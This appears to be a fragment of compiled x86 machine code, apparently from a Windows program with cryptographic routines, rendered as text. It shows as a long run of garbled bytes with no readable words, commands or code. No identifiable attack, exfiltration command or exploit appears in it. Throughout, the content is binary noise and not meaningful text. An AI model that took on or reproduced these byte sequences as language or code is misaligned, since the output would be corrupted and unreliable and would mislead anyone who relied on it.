<A|E<FA,7�L$B��<0|<9�����а��0��<A|<F�����а��7��2�Ð��D$S�\$U�l$���E  ~MVW�D$��D$PQ�G����|$���3������+����ы������O���D$�ʃ�CH�D$u�_^][Ð���������SU�l$V3�W��~)�|$�\$�D$PS��������t�L$F���G;�|�_^]�[�_^]2�[Ð����������U��j�h�HB d�    Pd�%    ��  V��� � �:��/T���� Ë�����(� hH�C ��z �$�$� iH,�~��X���;���aY�=��� �>�k� ���������E. �X �=XIP��� ��a�4$�? �4�h��6U�A   ݹw��>&�M��^d�    ��]ÐU��j�h�HB d�    Pd�%    ��  SVW��� � ��N� ��膌 �X	�;@��� �<$_W�$�P� ���T ��n@ ��E �� �� �/����Q��Y��者 E1)Y�p�3 #��g �+�d<`Z�J� ^�����ޅ���:��u�4$�XQC ����B ��	~ZP�h�,_�X�����[����$�@� �$Q�@uB ��薳 /&�w�Ë 	��8��� ��2Rз���� �9� �7h �� zi��a ��h�^vt^��[��Ʀ��W�ԟ �UV �w   �m]�����M�_^�   [d�    ��]Ð�����������D$�+���Ð�����U��j�h�HB d�    Pd�%    ��  �ESVW���e��-  �  �E�    � ���P��� �8 b��A������� �?���F�&5 �h�6��Y��!����   �� ��$S�P� e��Lh�J7�� �H�K�`�$�$Qh,�Y�����Ձ���貃 ;��E����ZY�$�V� É$� ������ -|+m�/i �4$�( Qh�O-���@ �$� �h	1��@}��W �E��M���� �� ��� U�D   ���(��   �M�d�    _^[��]ø��@ ËM�_^3�d�    [��]ÐU��QVW3��� �hu �1��V�%����H����, ���I �|t ��Zh��C �� ��Ƨ9`É�$�G� �j� �,!�N�D� &��9� X�f<��.���	��G<`�� �*��< ���d V�+�@���*� 6'G�� �/   ��%�g��%	��"��0��_^��]Ð����������U��QSVW�E� ��� u��Y����I� �8PE  �r� �E� �Ǹ[{J���蔗���,��HJI߇<$�[� �E�PhzVP�X��+Q���1 ��� �d R���W ��Ѫ �TG�w�3�_^�   [��]Ð������������@ � yB Ð��V���   �D$t	V�/c ����^� ���yB Ð��������d�    j�hIB Pd�%    ��,SVW��3�8_��   �D$L�547C �D$�����3��\$�\$�\$U���Ij��L$U��sB ��t�|$�͋����ʃ��D$�l$�(�L$P�\$DQ�L$$�D$TLRC ��uB �T$��tB �T$,�\$0�\$4�\$8��T$QSR�L$8�D$P��tB ��tB �L$ hh�B Q�D$(�\$L�_g ]�G3�;�~�t$L�D$H��2�F��O@B;�|�L$8_^[d�    ��8� ���������������d�    j�h2IB Pd�%    �A��4S3�:���   �D$UV�547C W�D$�����3��\$�\$ �\$$���Ij��L$U��sB ��t�|$�͋����ʃ��D$�l$ �(�L$�\$LQ�L$,�D$LRC ��uB �T$��tB �T$4�\$8�\$<�\$@��T$QSR�L$@�D$X��tB ��tB �L$(hh�B Q�D$0�\$T�/f _^]�A�L$8[d�    ��@Ðd�    j�hRIB Pd�%    �A��,S3�UV:�W��   �D$P�547C �D$�����3��\$�\$�\$j���I��L$U��sB ��t�|$�͋����ʃ��D$�l$�(�L$P�\$DQ�L$$�D$TLRC ��uB �T$��tB �T$,�\$0�\$4�\$8��T$QSR�L$8�D$P��tB ��tB �L$ hh�B Q�D$(�\$L�/e �l$P�q�ř��;�te�D$L+�֍<(�A+�t8Ht(HuH;�~D�ʊ؊�����f�����΃��*�*;�~�ʸ    �;�~��3������΃��*��ŋL$<_^][d�    ��8� �����������j�hiIB d�    Pd�%    ��SV��W�t$�8tB �<tB �L$�F4�ӡ@tB �L$�8�ӋG���s@�G�=DtB �L$�׍L$�׍N�V�N�N�V�N �F�V$�N(�F�V,�N0�     �V �    �F0�     �N�    �V�    �F,�     �L$(j j j Q���D$0    �DyB �HtB �L$��_^[d�    ��� �V���4tB �D$t	V�^^ ����^� �V�q�W�~T���0tB ����tB �D$t	V�/^ ����_^� �V�qT���0tB ����tB ^Ð���������V��������B ��^Ð�������������V���   �D$t	V��] ����^� ����B ���������d�    j�h�IB Pd�%    ��\SU��V�L$x3�;�W��   ��$�   �@7C �D$ �����3��t$$�t$(�t$,���IQR�L$(��tB ��$�   �t$tQ�L$4Ǆ$�   LRC ��uB �T$ V�L$@�D$x�T$@��tB ��tB �T$ �QVR�L$H��tB ��tB �L$0hh�B Q�D$8�D$| �b ��$�   ��   ��$�   �D7C �D$ �����3��t$$�t$(�t$,���IQR�L$(��tB ��$�   �D$t   Q�L$4Ǆ$�   LRC ��uB �T$ V�L$@�D$x�T$@��tB ��tB �T$ �QVR�L$H��tB ��tB �L$0hh�B Q�D$8�D$|�da ��$�   ����   ����   �� ��   ��8C ���3���$�   ���I�T$ Qh�8C �L$(�t$,�t$0�t$4��tB ��$�   �   P�L$4�\$xǄ$�   LRC ��uB �L$ V�L$@�L$@�D$x��tB ��tB �L$ �PVQ�L$H��tB ��tB �D$0hh�B P�T$8�\$|�` ��$�   ����   ����   �� ��   ��$�   �H7C �L$ �����3��t$$�t$(�t$,���IQR�L$(��tB ��$�   �   R�L$4�\$xǄ$�   LRC ��uB �D$ V�L$@�D$x�D$@��tB ��tB �D$ ��L$<RVP��tB ��tB �T$0hh�B R�L$8�\$|��_ ��$�   ;���  ����  ��$�   ;���  ����  �U3҅ۉE~�
�D4L�B���$�   F;�|鋴$�   �ύ��  �щ}�����ʃ��M�������  ���ȃ��ˍt$L�э}���]�ʃ��E��t"��tǅ�     �3�E�� ���$�����E��u�
   �������������  �E����3ҋ؋��  �����\$||�u8��~��3���󫋅�  B�� ;�~担�  3҅�| ���  ��~��3���󫋅�  B�� ;�~拵�  �EF��  ������$�   ��D$L������$�   ~A��$�   3҃�����Q�@3Ҋ��	Q�@3Ҋ0	Q�@3Ҋ	Q���$�   @J��$�   u�3Ʌ�~p��  ��$�   ;��3  ��������������$�   ��$�   ��T�8���  ��$�   +�A��$�   �0������  ��$�   ;ω�$�   |�;���  Ǆ$�   x�B ���  ��$�   3҉�$�   ��$�   3��6��x�B 3֊�����3Ҋ�x�B 3�%�   3ҋ�  ��x�B 3���$�   ��3�3Ҋ�x�B ��3�$�   3�B����  ��$�   t&����   ��   �W��p��3މ��Ju��   ��   �   �p��3މ��Ju�(  3҉�$�   ��$�   3���x�B ��$�   3�����x�B 3�3�3Ҋ�%�   ����x�B 3Ҋ�x�B ��,  3���3�   3Ɖ�,  ��0  �p��3މ��Ju��Ǆ$�       ~^��  ��$�   �\$|;�}\���������������^����\�8���  +ǋ�$�   �F�����  ��$�   @A;ǉ�$�   |���$�   �\$|;��;������  �   ;ȉD$|��   ��  ��$�   ��~M���3ɉ�$�   ��$�   3҃���$�   ��x�B 3�x�B 3Ҋ�%�   3�x�B ��x�B 3�O�N�u��D$|��$�   ���  @�� ;��D$|��$�   |��L$l_�E^][d�    ��h� ��$�   �-<7C V�L$�D$��tB �����3�j���I�ٍL$S��sB ��t$�|$�ˋы����ʃ��D$�\$3�� ��$�   �
   Q�L$P�\$xǄ$�   LRC ��uB �T$V�L$\�D$x�T$\��tB ��tB �T$�QVR�L$d��tB ��tB �L$Lhh�B Q�D$T�\$|�,Z ��$�   �87C �D$ �����3��t$$�t$(�t$,���IQR�L$(��tB ��$�   �   Q�L$4�\$xǄ$�   LRC ��uB �T$ V�L$@�D$x	�T$@��tB ��tB �T$ �QVR�L$H��tB ��tB �L$0hh�B Q�D$8�\$|�Y �������������d�    j�hJB Pd�%    ��4��S3ۊHV:�W��   �D$�547C �D$�����3��\$�\$�\$ U���Ij��L$U��sB ��t�|$�͋����ʃ��D$�l$ �(�L$�\$LQ�L$,�D$LRC ��uB �T$��tB �T$4�\$8�\$<�\$@��T$QSR�L$@�D$X��tB ��tB �L$(hh�B Q�D$0�\$T�X ]�H���  �э��  ���ʃ��L$@_^[d�    ��@Ð������   SUV��W�   3��|$�D$ �\$�f���9C ���3����+�����������O���̓��|$����B�r��I�ًȋ�|���̓��JQ�J�RQP�Rh9C �D$P��uB ���L$@��*  �|$���3����IQ�L$Q�L$H��*  ��$�   �L$@R�,  _^][�Ĝ   � ���j�h2JB d�    Pd�%    ��DSU��3�VW�E�l$$:���  �D$d�547C �D$(�����3��\$,�\$0�\$4���I��L$(� tB ;�s�$tB �|$,;�t!�G�:�t<�t;�u=��S�L$,�G���tB �U;�uj�L$,��tB �C�D$4��w;�sj�L$,��tB U�L$,�(tB �|$,�͋����ʃ��D$,�l$0�(�L$d�\$\Q�L$<�D$hLRC ��uB �T$(��tB �L$0�T$D�\$H�\$L�\$P� ���D$\;�s��;�vN;�uJ�D$,;�u�,tB �x��s7j�L$H��tB �D$,;�u�,tB �L$0�T$4�D$H�L$L�T$P�H����H��>jU�L$L��sB ��t-�t$,;�u�5,tB �|$H�͋����ȃ��L$H�l$L�)��tB �D$8hh�B P�T$@�\$d�U �D$d3�3ɋ]8��H��@�}<���@3Ɋ(�@3Ɋ�@3�3ӊ3ۋ�3ɊH�T$��@���@3Ɋ(�@3Ɋ�@3�3���X��@�t$���@3ۊ8�@3ۊˋ]@@3�3ۉL$���3ۊX��@���@3ۊ8�X�EDދ��  3Ét$ �D$���5  ��`N�t$d3ۃ� ��3��D$�4�x�B �<�x�B 3��D$3��}܋�x�B ��%�   3��x�B 3��D$3�3�3��\$�<�x�B ��x�B 3�3��Ƌ�x�B �D$3��Ё��   ��x�B 3ҊT$3��]�3�3ۊ܋�x�B ��x�B 3�3ҊT$��x�B �с��   3Ë�x�B �U�3�3�3Ҋ�3ɊL$�t$��x�B �t$d��x�B 3ɊL$3Ӌ�x�B �L$���   3ӉD$��x�B ��3Ӌ]�3�N�T$�L$�t$d������t$ �l$$��3ҋ|.8�T$�t.8�Ǌ�x�B ����2ЋD$h���3ҊT$�|$d��x�B 2Ӌ߈P3Ҋ�����x�B 2ӊ\$d�P�T$���   ��x�B 2ӈP�~3ҋߊT$�|$d����x�B 2Ӌ߈P3ҊT$����x�B 2Ӌ߈P3ҊT$����x�B 2ӊ\$d�P�T$���   ��x�B 2ӈP�~3ҋߊT$�|$d����x�B 2Ӌ߈P3ҊT$����x�B 2Ӌ߈P	3ҊT$����x�B ���   2ӊ\$d�P
�T$���   _��x�B 2ӈP�v3ҋފT$�t$`����x�B 2ӋވP3ҊT$����x�B 2ӋވP3ҊT$^����x�B ]2�[�P��x�B 2L$T�H�L$Dd�    ��P� j�hRJB d�    Pd�%    ��HSUV��3�W�F�t$ :���  �D$h�547C �D$,�����3��\$0�\$4�\$8���I��L$,� tB ;�s�$tB �|$0;�t!�G�:�t<�t;�u=��S�L$0�G���tB �U;�uj�L$0��tB �C�D$8��w;�sj�L$0��tB U�L$0�(tB �|$0�͋����ʃ��D$0�l$4�(�L$h�\$`Q�L$@�D$lLRC ��uB �T$,��tB �L$4�T$H�\$L�\$P�\$T� ���D$`;�s��;�vN;�uJ�D$0;�u�,tB �x��s7j�L$L��tB �D$0;�u�,tB �L$4�T$8�D$L�L$P�T$T�H����H��>jU�L$P��sB ��t-�t$0;�u�5,tB �|$L�͋����ȃ��L$L�l$P�)��tB �D$<hh�B P�T$D�\$h�+P �D$h3�3ɋ��  ��H��@3����@3Ɋ(�@3Ɋ�@3�3׊�T$��3ɊH��@���@3Ɋ(�@3Ɋ�L$ @���  3Ɋ�X3���@�t$���@3ۋt$ �8�@3ۋ�   ��@3�3ϊ�L$��3ۊX��@���@3ۊ8�Xދt$ 3�  ���  �\$���D$(�J  ��   H�t$h�D$$3���3ۊ\$�4�x�B 3��D$�,�x�B 3��<�x�B ��%�   3���x�B �D$h3�3ۋx��\$3�3��D$�<�x�B ��x�B 3�3��Ɓ��   �,�x�B �D$%�   3��,�x�B �D$h3��3��D$3�3ۊ\$�,�x�B ��x�B 3�3��D$��x�B �D$h3��x�B �P3�3�3ҊT$3ۊ݃� ��x�B �D$h��x�B 3�3ɊL$��x�B �L$���   3Ӊt$��x�B ��3ӋX؋D$$3Ӌ�H�T$�L$�\$�D$$������D$(�t$ ����0�  ��0�  3��ϊD$�|$h����x�B �D$l2�3ɊL$��ߊ�x�B ��2ˋ߈H3ɊL$����x�B 2ˊ\$h�H�L$���   ��x�B 2ˈH�~3ɋߊL$�|$h����x�B 2ˋ߈H3ɊL$����x�B 2ˋߋ|$�H3Ɂ��   �L$����x�B 2ˊ\$h�H��x�B 2ˈH�~3ɋߊL$�|$h����x�B 2ˋ߈H3ɊL$����x�B 2ˋ߈H	3Ɋ�����x�B �|$2ˊ\$h���   �H
���   ��x�B _2ˈH�v3ɋފL$�t$d����x�B 2ˋވH3ɊL$����x�B 2ˋވH3ɊL$^����x�B ]2�[�H��x�B �L$X2ыL$H�Pd�    ��T� �������������d�    j�hrJB Pd�%    ��PSU��VW�E����   �D$p�547C �D$43�����3��l$8�l$<�l$@���Ij�ٍL$8S��sB ��t �|$8�ˋ����ʃ��D$8�\$<� �L$p�l$hQ�L$H�D$tLRC ��uB �T$4��tB �T$P�l$T�l$X�l$\��T$4QUR�L$\�D$t��tB ��tB �L$Dhh�B Q�D$L�D$p �kK �E��u�T$t�D$pRP��������  ��������u3��	3�����@���ۋ���B ����B ����B �T$0�D$ �L$��\  ~^�t$p�M8�L$�\$3Ɋ����8F3Ɋ���F3ɉ8�.�F3ɉ8���	�L$F���	1�|$�L$��I�|$�L$u��L$���  �   ;��D$��   �EX�D$p����   �D$p��D$���L$ +�+ʍ�<  �D$(�L$$�\$��L$$�D$(ƃ������3Ҋ��]  �1�T$,������\  �T$,%�   ��x�B ��x�B ��3ʙ��3����^  ��x�B 3�3ҊW��x�B 3ȋD$���3ʉD$�D$�O�FH�D$�t����T$0�D$�ˍ�<  ��\  �t$p���  @�� ;��L$�D$�t$p�
������D$p    ��   �t$t��\  �D$t�D$ +�+����T$0�D$,���  �L$p��3��L�8�T$t�B������x�B 2T$0�F�:���3����^  ������x�B 2�Ǚ��3�F���]  ������x�B 2T$,�F�:������\  %�   ��x�B �D$p2ыL$t�F@��G;ÉD$p�L$t�W����L$`_^][d�    ��\� �������������d�    j�h�JB Pd�%    ��PSU��VW�E����   �D$p�547C �D$43�����3��l$8�l$<�l$@���Ij�ٍL$8S��sB ��t �|$8�ˋ����ʃ��D$8�\$<� �L$p�l$hQ�L$H�D$tLRC ��uB �T$4��tB �T$P�l$T�l$X�l$\��T$4QUR�L$\�D$t��tB ��tB �L$Dhh�B Q�D$L�D$p �G �E��u�T$t�D$pRP�������  ��������u3��	3�����@���ۋ���B ����B ����B �T$0�D$ �L$��\  ~a�t$p���  �L$�\$3Ɋ����8F3Ɋ���F3ɉ8�.�F3ɉ8���	�L$F���	1�|$�L$��I�|$�L$u��L$���  �   ;��D$�   ��  �D$p����   �D$p��D$���L$ +�+ʍ�<  �D$(�L$$�\$��L$$�D$(ƃ������3Ҋ��]  �1�T$,������\  �T$,%�   ��x�B ��x�B ��3ʙ��3����^  ��x�B 3�3ҊW��x�B 3ȋD$���3ʉD$�D$�O�FH�D$�t����T$0�D$�ˍ�<  ��\  �t$p���  @�� ;��L$�D$�t$p�
������D$p    ��   �t$t��\  �D$t�D$ +�+����T$0�D$,���  �L$p��3�����  �T$t�B������x�B 2T$0�F�:���3����^  ������x�B 2�Ǚ��3�F���]  ������x�B 2T$,�F�:������\  %�   ��x�B �D$p2ыL$t�F@��G;ÉD$p�L$t�T����L$`_^][d�    ��\� ����d�    j�h�JB Pd�%    ��\SU��VW�E����   ��$�   �47C �D$$3������3��t$(�t$,�t$0���IQR�L$,��tB ��$�   �t$tQ�L$8Ǆ$�   LRC ��uB �T$$V�L$D�D$x�T$D��tB ��tB �T$$�QVR�L$L��tB ��tB �L$4hh�B Q�D$<�D$| �
D ��$�   ���i  �M��3�����X  �E����   �T$�T$|�T$|��3ҋ�$�   ���vV�D$|���  PW���e���SW���L����M��ы�$�   ����3҃��M�|$|��t$��F�|$|�t$;�r��L$l_^][d�    ��h� ���D$    ut�D$|3҉D$|����$�   ��vō��  SW��������L$|QS��������M��ы�$�   ����3҃��M�|$|��t$��F�|$|�t$;�r��j�����3���|$|��$�   ���Q���SW���Z����M�T$��B�ƉT$3���9D$r��'�����$�   �5H7C j �L$�D$��tB �����3�j���I��L$U��sB ��t �|$�͋����ʃ��D$�l$�( ��$�   �   Q�L$T�\$xǄ$�   LRC ��uB �T$j �L$`�D$x�T$`��tB ��tB �T$�Qj R�L$h��tB ��tB �L$Phh�B Q�D$X�\$|��A ���������d�    j�h�JB Pd�%    ��\SU��VW�E����   �D$|�47C �D$$3������3��t$(�t$,�t$0���IQR�L$,��tB �L$|�t$tQ�L$8Ǆ$�   LRC ��uB �T$$V�L$D�D$x�T$D��tB ��tB �T$$�QVR�L$L��tB ��tB �L$4hh�B Q�D$<�D$| ��@ ��$�   ����  �M��3������  �E����   �t$|��$�   ��$�   �ÉT$|3���t$��vg��t$�D$|��PV������L$|���  WQ���1����M�Ë�����3҃��M�t$|��|$�t$|��$�   �F�|$��$�   ;�r��L$l_^][d�    ��h� �t$|��Ǆ$�       ��   ��$�   3҉D$|����t$��v���t$�L$|���  QW�������T$|VR�������M3ҋ����ȋÃ��M�t$|��|$�t$|��$�   �F�|$��$�   ;�r��N�����3���$�   ���9���WV��������M��$�   ��B�É�$�   3���9�$�   r������L$|�5H7C �L$j �L$��tB �����3�j���I�ٍL$S��sB ��t �|$�ˋ����ʃ��D$�\$� �L$|�   Q�L$T�\$xǄ$�   LRC ��uB �T$j �L$`�D$x�T$`��tB ��tB �T$�Qj R�L$h��tB ��tB �L$Phh�B Q�D$X�\$|�t> ������������j�h�LB d�    Pd�%    ���	  SU��3�VW�E�\$����   �D$�547C S�L$�D$��tB �����3����IQV�L$ ��tB �L$��$�	  Q�L$,�D$LRC ��uB �T$�L$4RƄ$�	  �uB ��tB �L$(hh�B Q�D$0��$ 
  �= ��$
  ��$ 
  SV��sB �����?  ��$�   �D$T<yB ��sB �D$   j j�T$`j R�L$dǄ$
     ��tB j �L$\Ǆ$�	     �����D$T�H�DT8yB �P7C h�8C V�5�tB �D$\RPǄ$
     �փ�P��> ��P��P��tB �-�tB ���L$Xj�ՋL$t�T$j �1�L$�T$��tB �����3����IQV�L$ ��tB �j �L$\��$�	  �ՍD$�L$(P�D$LRC ��uB �L$Ƅ$�	  Q�L$8�uB ��tB ��$�	  �T$(�D$(hh�B P�Q< �F�=,tB ��t����sB ��$  ��$x  ��sB �D$   j ��$(  j R��$(  Ǆ$
     ��sB j ��$(  Ǆ$�	     ��sB ��$  ��sB j!W�HƄ$ 
  	��$  ��$,  ��sB ��uP��$   j�H��$  ��sB ��$  �
   ��$�	  �B��   ��9  ��$�   �D$T<yB ��sB �D$   j j�L$`j Q�L$dƄ$
  ��tB j �L$\Ǆ$�	     �����T$T�B�DT8yB �L7C h�8C V�5�tB �T$\QRƄ$
  �փ�P��< ��P��P��tB �-�tB ���L$Xj�ՋD$t�L$j �0�L$�L$��tB �����3����IQV�L$ ��tB �j �L$\��$�	  �ՍT$�L$(R�D$LRC ��uB �D$�L$4PƄ$�	  �uB ��tB ��$�	  �L$(�T$(hh�B R�7: �C�5,tB ��t���sB ��$  ��$�  ��sB �|$j j��$�  j Q��$�  Ƅ$
  ��tB j ��$�  Ǆ$�	     ��sB ��$�  � tB j"V�BƄ$ 
  ���  ��$�  ��sB ��u��$�  Pj�B���  ��sB ��$�  Ƅ$�	  �Q���  �a  ��$�  Ǆ$\  <yB ��sB �D$   j j��$h  j P��$l  Ƅ$
  ��tB j ��$d  Ǆ$�	     �m�����$\  �QǄ\  8yB �L7C �5�tB h�8C S��$d  PQƄ$
  �փ�P�: ��P��P��tB �-�tB ����$`  j�Ջ�$|  �D$j �L$H�2�D$H��tB �����3����IQV�L$L��tB �j ��$d  ��$�	  �ՍL$�D$LRC Q��$�   ��uB �T$D��$�   RƄ$�	  �uB ��tB ��$�	  ��$�   ��$�   hh�B Q� 8 �U �   3���$�   Ƅ$�    󫍄$�   ��P�R��$�   j Q��$�  �tB �U ���R�   3���$�  Ƅ$�   �`   ��$�  ��$�  ��$h  �`   ��$i  �h�  ��$�  h   ��$$  PQ��$H  ������$�  j�R��$@  �c�������~e���  }��$�  VP���������U ��$h  V��$�  PQ���R��$h  VR��$�  �tB ��$�  j�P��$@  ������������$$  �tB ��u��$  Pj�Q��$  ��sB ��$�  �tB ��$�  Ƅ$�	  
�tB ��$  Ǆ$�	  �����tB ��$�	  _^][d�    ���	  � ��������j�h`NB d�    Pd�%    ��
  SU��V3�W�E�t$����   �D$�47C V�L$�D$��tB �����3����IQS�L$ ��tB �L$��$
  Q�L$,�D$LRC ��uB �T$�L$4RƄ$ 
  �uB ��tB �L$(hh�B Q�D$0Ƅ$$
   �5 ��$(
  ��$$
  VS��sB �����?  ��$�   �D$T<yB ��sB �D$   j j�T$`j R�L$dǄ$,
     ��tB j �L$\Ǆ$ 
     �����D$T�H�DT8yB �P7C �5�tB h�8C S�D$\RPǄ$,
     �փ�P�6 ��P��P��tB �-�tB ���L$Xj�ՋL$t�T$j �1�L$�T$��tB �����3����IQV�L$ ��tB �j �L$\��$ 
  �ՍD$�L$(P�D$LRC ��uB �L$Ƅ$
  Q�L$8�uB ��tB ��$
  �T$(�D$(hh�B P�04 �C�=,tB ��t����sB ��$@  ��$�  ��sB �D$   j ��$L  j R��$L  Ǆ$(
     ��sB j ��$L  Ǆ$ 
     ��sB ��$@  ��sB j!W�HƄ$$
  	��H  ��$P  ��sB ��uP��$D  j�H��H  ��sB ��$@  Ǆ$
  
   �B��D  ��9  ��$�   �D$T<yB ��sB �D$   j j�L$`j Q�L$dƄ$,
  ��tB j �L$\Ǆ$ 
     �h����T$T�B�DT8yB �L7C �5�tB h�8C S�T$\QRƄ$,
  �փ�P�4 ��P��P��tB �-�tB ���L$Xj�ՋD$t�L$j �0�L$�L$��tB �����3����IQV�L$ ��tB �j �L$\��$ 
  �ՍT$�L$(R�D$LRC ��uB �D$�L$4PƄ$ 
  �uB ��tB ��$
  �L$(�T$(hh�B R�2 �F�=,tB ��t����sB ��$(  ��$�  ��sB �D$
   j j��$�  j Q��$�  Ƅ$,
  ��tB j ��$�  Ǆ$ 
     ��sB ��$�  � tB j"W�BƄ$$
  ���  ��$�  ��sB ��u��$�  Pj�B���  ��sB ��$�  Ƅ$
  �Q���  �7  ��$�   �D$T<yB ��sB �D$   j j�D$`j P�L$dƄ$,
  ��tB j �L$\Ǆ$ 
     �U����L$T�Q�DT8yB �L7C h�8C V�5�tB �L$\PQƄ$,
  �փ�P�2 ��P��P��tB �-�tB ���L$Xj�ՋT$t�D$j �L$�2�D$��tB �����3����IQV�L$ ��tB �j �L$\��$ 
  �ՍL$�D$LRC Q�L$,��uB �T$�L$4RƄ$ 
  �uB ��tB ��$
  �D$(�L$(hh�B Q�0 �U �   3���$  Ƅ$   󫍄$  ��P�R�   3���$�   Ƅ$�    󫍌$�   j Q��$H  � uB �   ��$  ��$�   3���d  ��$�  Ǆ$�  <yB ��sB �D$*   j j��$�  j P��$�  Ƅ$,
  ��tB j ��$�  Ǆ$ 
     ������$�  �QǄ�  8yB �X7C �T7C �5�tB PS��$�  QRƄ$,
  �փ�P��0 ��P��P��tB �-�tB ����$�  j�Ջ�$�  �L$j �0�L$H�L$H��tB �����3����IQV�L$L��tB �j ��$�  ��$ 
  �ՍT$��$�   R�D$LRC ��uB �D$D��$�   PƄ$ 
  �uB ��tB ��$�   ��$�   hh�B R��$$
  �.. �E ���P�   3���$  Ƅ$   �`   ��$	  ��$  ��$�  �`   ��$�  �h�  ��$  h   ��$H  QR��$l  ������$  j�P��$d  �л������~K�U ��$�  V��$  PQ���R��$�  VR��$�  �tB ��$  j�P��$d  腻���������$@  ��sB ��$�  �tB ��$�  Ƅ$
  
�tB ��$@  Ǆ$
  �����tB ��$
  _^][d�    ��
  � �������������V���4�B W��+�   �<�:��Iu�3�_�H �H$^Ð�������d�    j�h�NB Pd�%    ��,SU��V�L$LW����   �D$L� 9C �D$���3�3����Ij��L$U�\$�\$ �\$$��sB ��t$�|$�͋Ѿ 9C ���ʃ��D$�l$�(�L$L�\$DQ�L$$�D$PLRC ��uB �T$��tB �T$,�\$0�\$4�\$8��T$QSR�L$8�D$P��tB ��tB �L$ hh�B Q�D$(�\$L��+ �E ��;ЉU s�E$�}$���������?�}$tW�@   �|((+�;�s�t$L�����ȃ���   �t$L�ˋ����ʃ����{  �L$L�D$P�+ÉL$L�D$P�ȃ�@|9����������ȉL$P�t$L�   �}(���9  �L$L��@K�L$Lu݋L$P�t$L�э}(���ʃ���Eh�L$<_^][d�    ��8� ���������d�    j�h�NB Pd�%    ��,SV��3�W8^h��   �D$H�`9C �D$���3��\$���I�\$Qh`9C �L$�\$ ��tB �L$H�\$@Q�L$ �D$LLRC ��uB �T$S�L$,�D$D�T$,��tB ��tB �T$�QSR�L$4��tB ��tB �L$hh�B Q�D$$�\$H�* �F �?   ����?+ȍ|0(��G��s%��3����ʃ�����   �   3��~(�����3������ʃ��N$�Fc��V$H����N$H����V$���P��N �Fg��V H����N H����V ���ΈP��   �L$H��A�   ����Q�P����Q�P�����P����Q���Ou؋��!   �L$8_^[d�    ��8� ��������������4�B VW��+Ѿ   �<�8��Nu�3�_�A �A$�Ah^Ð��������,  SUVW�L$8�q(�|$<�   3�3Ҋ&�V�F�����3ҊV�����M�G�uٍt$@�D$0   ��F4����������ڋ������݋�3�����3�������Ӌ�����݋n3Ӌ^���
3ЋD$���H�~8�D$u��Q�q�T$$���֋A������֋�D$ �A�����Ջ�3��������D$�AՋl$3���3Ջ-4�B #։D$3ЋAǋ|$<Ћ�Ջ�׋������������
ŋ�3�������ŋl$$3��D$ ËI#ŋl$ #��ŋ���ŋ������ы��\$4�����t$,�L$�3�ы������3�T$��3�#��8�B 3�͋l$��L$@����������ʋЋ�����
Ջ�3ʋ�����Ջl$ 3ʋ��#Ջ�#�Ջ��L$$�Ջ���������L$$������L$$3��������L$3��3��L$$#��<�B 3�͋l$��L$D����������΋������
���3΋��������3΋��#�#�����L$ �������������L$ �����L$ 3��������L$3��l$$3͋l$ #͋l$3͋-@�B �|$H͋l$,ϋ�͋�L$������ϋ�����
���3ϋ��������3ϋ��#�#���l$���l$݋�������ˉ\$(�����3�L$(������ًL$$3�\$ 3ˋ\$(#ˋ\$$3ˋD�B ݋l$Lˋ\$͋�ˋ߉L$������ً�����
͋�3ً�����͋�3ً��#�#�͋l$�\$�ÉL$�؋ȋ�����ً�����͋�3ً�����͋l$(3ًL$ 3͋l$ #�3͋-H�B �\$P͋l$$�͉L$�L$�������������
ًL$3������ً�3�\$ˉl$��#�#�\$�L$͋l$�ˋ\$ӉL$$��������ʋ�����ˋ�3������ˋ\$(3��3�#�3ˋL�B ݋l$ ˋ\$T�͉L$�L$$��������������
ًL$$3������ًL$3�\$$ˉl$�l$#�#�\$�L$͋l$�ˋ\$�L$ �ދ�����ً΋�����͋�3ً�����͋-P�B 3ً�3��\$(#�3�͋l$X�ˉL$�L$ �ً�����݋�����
�L$ 3݋������L$$3݋l$ ͋l$#͋l$$�L$�L$ #�L$͋l$�\$���L$(�ߋϋ�����ً�����͋�3ً�����͋-T�B 3ً�3��#�3�͋l$\�ȉL$�L$(���������������
Ë�3������Ë\$ 3���#�#D$$Ë\$�����L$ˋً�����݋�L$�����3݋L$��������3݋l$3�#͋-X�B �3�͋l$`͋�ʋ������L$�ȋ�����
ʋ�3�ȋ\$ ����ʋT$(3���#ˋ�#�ˋ\$���ʋT$$Ӌ�������ډT$$����ڋT$$3������ڋT$3��3ڋT$$#ڋ\�B 3��ڋT$dڋ�ދ������ы�����
Ջ�3������Ջl$(3���#Ջ�#�Ջ��t$ �Ջ�������މt$ ����ދt$ 3������ދt$$3�\$3ދt$ #ދt$3ދ5`�B ���ދt$hދ�ߋ������������
���3����������3����#�#�����|$(���ߋ�����݋�|$(�����|$(3݋������|$$3݋l$ 3��l$(#��l$$3��-d�B �\$��l$l�����މ|$������ߋ�����
���3ߋ��������3ߋ��#�#���l$�\$�É|$�؋�������ߋ��������3ߋ������3ߋ|$ �l$(3��l$ #�3��-h�B �\$p��l$$���|$�|$�������������
ߋ|$3������ߋ�3�\$��l$��#�#�\$�|$��l$���\$ˉ|$$������������������3��������\$(3��3�#�3��l�B ݋l$ ��\$t���|$�|$$�������������
ߋ|$$3������ߋ|$3�\$$��l$�l$#�#�\$�|$��l$���\$Ӊ|$ �ڋ�����ߋ����������3ߋ�������-p�B 3ߋ�3��\$(#�3���l$x���|$�|$ �ߋ�����݋�����
�|$ 3݋������|$$3݋l$ ��l$#��|$�l$$�|$ #�|$��l$�\$��|$(�ދ�������ߋ��������3ߋ�������-t�B 3ߋ�3��#�3���l$|���D$(�|$�؋�������ߋ�����
���3ߋ�������l$$3ߋ|$ �#��l$ #���l$�\$��|$�|$��ߋ�����݋�|$�����|$3݋�������3݋l$3�#��-x�B �3����$�   ���L$�|$�ً�������ߋ�����
���3ߋ�������l$ 3ߋ��#���#���l$�\$��|$,�|$$��ߋ�����݋�|$$�����|$$3݋�������3݋l$3��l$$#���$�   3����-|�B ���|$�T$,�ڋ�����ߋ�������
���3ߋ��������3ߋ��#�#���l$�\$��|$�|$ ��ߋ�����݋�|$ �����|$ 3݋������|$3݋l$$3��l$ #��l$3���$�   ���-��B ���t$�|$�ދ�������ߋ�����
���3ߋ������3ߋ����#�#���l$�\$�É|$0�؋�������ߋ��������3ߋ�������l$ 3ߋ|$$3��l$$#�3���$�   ���B ��l$���|$�|$0�������������
ߋ|$03������ߋ�3�\$0��l$��#�#�\$�|$��l$���\$ˉ|$������������������3��������\$ 3��3�#�3���$�   ݋l$$����B ���|$�|$�������������
ߋ|$3������ߋ|$03�\$��l$�l$0#�#�\$�|$��l$���\$Ӊ|$$�ڋ�����ߋ����������3ߋ��������$�   3ߋ�3��#�3���-��B �\$ ���|$�|$$�ߋ�����݋���
